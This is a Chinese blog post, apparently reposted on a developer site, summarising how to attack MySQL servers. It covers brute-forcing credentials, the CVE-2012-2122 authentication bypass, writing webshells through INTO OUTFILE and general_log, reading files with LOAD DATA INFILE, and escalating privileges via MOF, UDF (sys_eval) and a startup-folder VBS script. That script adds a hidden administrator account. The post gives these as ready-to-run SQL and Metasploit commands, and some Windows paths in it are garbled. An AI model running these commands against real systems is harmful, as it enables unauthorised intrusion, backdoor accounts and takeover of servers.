热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

jsp拿不到回显数据_渗透mysql数据库总结

前言今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。一、sqlshell获取要利用mysql首先得拿到一个可以执行sql的mysql才能利

前言

今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。

548b76e605dc7ee17074f2f4462bcb41.png

一、sqlshell获取

要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。

1、弱口令

这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也写过一个。要是运气好的话直接跑到弱口令就直接进去,当然也可以配合社工字典来跑这样成功率更高。

2、文件读取漏洞

需要挖一个任意文件读取漏洞,然后利用读网站的配置文件,里面存放着数据库账号密码。

3、信息泄露

扫目录扫网站备份文件,或者git泄露

4、sql注入

这个不用多说,要是权限够大直接sqlmap os-shell一把梭

5、身份认证绕过漏洞(CVE-2012-2122)

受影响版本:

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

在msf里面有模块,可以直接用auxiliary/scanner/mysql/mysql_authbypass_hashdump来跑

当数据库不能外连可以通过以下方法开放外连(注意防火墙):

可以修改host为%并刷新权限后,默认root等账号不允许远程连接

use mysql;update user set host = '%' where user = 'root';FLUSH PRIVILEGES ;select host, user from user;

二、mysql拿shell

1、用命令直接导出shell

原理:利用导出命令来导出shell。

条件:

1. 需要知道网站的物理路径(绝对路径)

通过程序报错,日志泄露,phpinfo,php探针等方式可以获取到物理路径。

2.允许导出

先查看是否允许导入导出

show variables like '%secure%'

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹,就会报告如下错误:

RROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

如果条件都满足的话,就可以开始了

outfile

select '' into outfile '/var/www/xx.php';

dumpfile

select '' into dumpfile '/var/www/xx.php';

注意:outfile函数可以导出多行,而dumpfile只能导出一行数据outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式

借助表导出。

Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('');Select cmd from temp into out file '/var/www/xx.php';Drop TABLE IF EXISTS temp;

也可以用mysql 的 -e 参数

mysql -u user -p passwd -e "select '' into outfile '/var/www/xxx.php'"

2、利用general_log拿shell

如果导入导出被禁用了就可以用这个方法试试。

原理:利用修改日志文件路径,往日志文件写入一句话。

条件:

1.对应web目录有写权限

2.需要有物理路径

3.如果拿到的是注入,还需要能执行堆叠注入

4.root用户,或者有对应权限的用户

利用如下:开启日志,更改路径,把一句话写入日志文件。

set global general_log=on;set global general_log_file='/var/www/1.php';select '';


三、任意文件读取

既然有文件导出,肯定也有文件导入。关于任意文件读取怎么用,我之前总结过。

条件:和导出shell的条件一样。

利用:先创建一张表,读取文件内容到表。

create table a (v text);

load data infile 'file_name' into table table_name fields terminated by '分隔符'

例如读text.txt:

load data infile 'C:/phpstudy/MySQL/test.txt' into table a fields terminated by ',';

查看内容

SELECT * FROM a

四、mysql提权

先推荐一个小工具https://github.com/T3st0r-Git/HackMySQL

1、mof提权

原理:

利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。

条件:

1、mof提权的前提是root用户

2、可以复制文件到%SystemRoot%System32WbemMOF目录下

利用:

网上工具也很多,可以直接用msf的exploit/windows/mysql/mysql_mof模块,执行成功后会直接反弹meterpreter。

2、udf提权

原理:

UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。


条件:

1、系统是Windows(Win2000,XP,Win2003);有一个mysql数据库的账户拥有insert和delete权限,以创建和抛弃函数。

2、Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。

3、Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于c:winnt

system32。

4、拥有相应目录的写权限

注意:一般Lib、Plugin文件夹需要手工建立(也可用NTFS ADS流模式突破进而创建文件夹)

select @@basedir; //查找到mysql的目录select 'It is dll' into dumpfile 'C:ProgramFilesMySQLMySQL Server 5.1lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录select 'It is dll' into dumpfile 'C:ProgramFilesMySQLMySQL Server 5.1libplugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录

利用:

直接用msf的use exploit/multi/mysql/mysql_udf_payload模块.

msf会将dll文件写入libplugin目录下(前提是该目录存在,如果该目录不存在的话,则无法执行成功),dll文件名为随机生成的名字(记下来后面手动创建需要用到)。该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。

手动创建sys_eval()

create function sys_eval returns string soname 'SGJECYG.dll';

执行手动创建的函数

select sys_eval('whoami');

检查有没有创建成功

select * from mysql.func where name = 'sys_eval';

删除函数

drop function sys_eval;

3、启动项提权

原理:本质还是用导出命令来实现,导出脚本到启动目录,服务器重启就执行脚本。

条件:上面说过了。

利用:

写个vbs到启动目录,想办法让服务器重启。

1,开始菜单当前用户启动文件夹--C:甥敳獲用户名AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup2,开始菜单所有用户启动文件夹--C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp3,注册表当前用户开机启动项目录--HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun4,注册表所有用户开机启动项目录--HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

写脚本

create table a (cmd text);//创建表insert into a values ("set wshshell=createobject(""wscript.shell"") " );//写数据到表insert into a values ("a=wshshell.run(""cmd.exe /c net user aabbcc 123456 /add"",0) " );insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators aabbcc/add"",0) " );select * from a into outfile "C:Documents andSettingsAll Users「开始」菜单程序启动a.vbs";//导出vb

msf下也有对应模块exploit/windows/mysql/mysql_start_up

五、拓展

其他常用msf模块

exploit/windows/mysql/scrutinizer_upload_exec(上传文件执行)

auxiliary/scanner/mysql/mysql_hashdump(mysql的mysql.user表的hash)

auxiliary/admin/mysql/mysql_sql(执行sql语句,navicat更香)

auxiliary/scanner/mysql/mysql_version(识别版本)



推荐阅读
  • 本文详细介绍了MySQL表分区的概念、类型及其在实际应用中的实施方法,特别是针对Zabbix数据库的优化策略。 ... [详细]
  • 本文介绍如何使用Java实现AC自动机(Aho-Corasick算法),以实现高效的多模式字符串匹配。文章涵盖了Trie树和KMP算法的基础知识,并提供了一个详细的代码示例,包括构建Trie树、设置失败指针以及执行搜索的过程。 ... [详细]
  • 图神经网络模型综述
    本文综述了图神经网络(Graph Neural Networks, GNN)的发展,从传统的数据存储模型转向图和动态模型,探讨了模型中的显性和隐性结构,并详细介绍了GNN的关键组件及其应用。 ... [详细]
  • 在现代移动应用开发中,尤其是iOS应用,处理来自服务器的JSON数据是一项基本技能。无论是使用Swift还是PHP,有效地解析和利用JSON数据对于提升用户体验至关重要。本文将探讨如何在Swift中优雅地处理JSON,以及PHP中处理JSON的一些技巧。 ... [详细]
  • 本文将指导你如何通过自定义配置,使 Windows Terminal 中的 PowerShell 7 更加高效且美观。我们将移除默认的广告和提示符,设置快捷键,并添加实用的别名和功能。 ... [详细]
  • 本文介绍了一种算法,用于在一个给定的二叉树中找到一个节点,该节点的子树包含最大数量的值小于该节点的节点。如果存在多个符合条件的节点,可以选择任意一个。 ... [详细]
  • 深入理解AutoMapper:.NET中的高效对象映射工具
    AutoMapper 是一个用于 .NET 平台的对象映射库,它能够简化不同对象模型之间的数据转换过程。本文将详细介绍 AutoMapper 的基本功能、应用场景及配置方法。 ... [详细]
  • 时序数据是指按时间顺序排列的数据集。通过时间轴上的数据点连接,可以构建多维度报表,揭示数据的趋势、规律及异常情况。 ... [详细]
  • [编程题] LeetCode上的Dynamic Programming(动态规划)类型的题目
    继上次把backTracking的题目做了一下之后:backTracking,我把LeetCode的动态规划的题目又做了一下,还有几道比较难的Medium的题和Hard的题没做出来,后面会继续 ... [详细]
  • 使用IntelliJ IDEA高效开发与运行Shell脚本
    本文介绍了如何利用IntelliJ IDEA中的BashSupport插件来增强Shell脚本的开发体验,包括插件的安装、配置以及脚本的运行方法。 ... [详细]
  • 本文介绍如何通过Java代码调用阿里云短信服务API来实现短信验证码的发送功能,包括必要的依赖添加和关键代码示例。 ... [详细]
  • C/C++ 应用程序的安装与卸载解决方案
    本文介绍了如何使用Inno Setup来创建C/C++应用程序的安装程序,包括自动检测并安装所需的运行库,确保应用能够顺利安装和卸载。 ... [详细]
  • 汇总了2023年7月7日最新的网络安全新闻和技术更新,包括最新的漏洞披露、工具发布及安全事件。 ... [详细]
  • 本文分享了作者在使用LaTeX过程中的几点心得,涵盖了从文档编辑、代码高亮、图形绘制到3D模型展示等多个方面的内容。适合希望深入了解LaTeX高级功能的用户。 ... [详细]
  • 本文回顾了作者在求职阿里和腾讯实习生过程中,从最初的迷茫到最后成功获得Offer的心路历程。文中不仅分享了个人的面试经历,还提供了宝贵的面试准备建议和技巧。 ... [详细]
author-avatar
121016710_ddc112_531_661_325
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有